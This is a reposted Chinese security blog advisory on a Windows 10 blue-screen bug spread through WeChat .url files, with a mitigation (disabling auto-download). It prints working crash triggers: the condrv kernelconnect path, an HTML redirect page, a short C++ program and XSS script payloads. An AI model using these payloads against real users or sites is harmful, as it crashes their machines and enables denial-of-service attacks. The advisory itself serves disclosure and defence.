红色警戒!Windows微信蓝屏文件刨析!

样本

图片

核心代码为:file:///globalroot/device/condrv/kernelconnect

受灾画面:

图片

图片

图片

分析:

图片

.url文件

url格式的文件是一种网页文件,只要接触就会触发访问

漏洞分析见之前发的文章:

Windows10使用浏览器崩溃复现及分析

防护方法:

仅对windows10系统有效,其它系统不受影响

windows微信用户可关闭自动下载

图片

更多方式(.html .exe):

<html><head></head><body>><script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script></body></html>
// BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。// #include <iostream>#include <Windows.h> int main(){    WCHAR fileName[] = L"\\\\.\\globalroot\\device\\condrv\\kernelconnect";    WIN32_FILE_ATTRIBUTE_DATA data;    GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);}

吾爱破解大牛分析:

https://www.52pojie.cn/thread-1354077-1-1.html

图片

其他利用方式XSS漏洞:

<script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script>
<script>document.location = 'file://./globalroot/device/condrv/kernelconnect';</script>

请做好个人防护!谨防漏洞威胁!转载请标注来自开普勒安全团队!谢谢!

转载自https://mp.weixin.qq.com/s/U66SldUJhqtV51WPxQMeCg

admin-r꯭o꯭ot꯭ 系统安全 web安全 安全架构
个人公众号:爱国小白帽
推送技术原创及好用的安全工具
因为我也是小白所以文章没啥深度,很适合小白学习,有问题可以一起探讨哦
已标记关键词 清除标记
相关推荐